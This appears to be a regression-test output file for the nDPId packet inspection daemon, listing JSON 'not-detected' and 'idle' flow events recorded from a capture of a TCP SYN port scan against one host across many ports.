+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060355,"flow_last_seen":1278275060355,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":711,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060355,"flow_last_seen":1278275060355,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":711,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060456,"flow_last_seen":1278275060456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":711,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060456,"flow_last_seen":1278275060456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":711,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":714,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":714,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":714,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":714,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":720,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":720,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":722,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":722,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":726,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":726,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":726,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":726,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27352,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1801,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27353,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1801,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27353,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27352,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1856,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27353,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1856,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27353,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27355,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27355,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27356,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27356,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27355,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27355,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27356,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27356,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":58080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":58080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":58080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":58080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":884,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6881,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":884,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6881,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":971,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6881,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":971,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6881,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":749,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
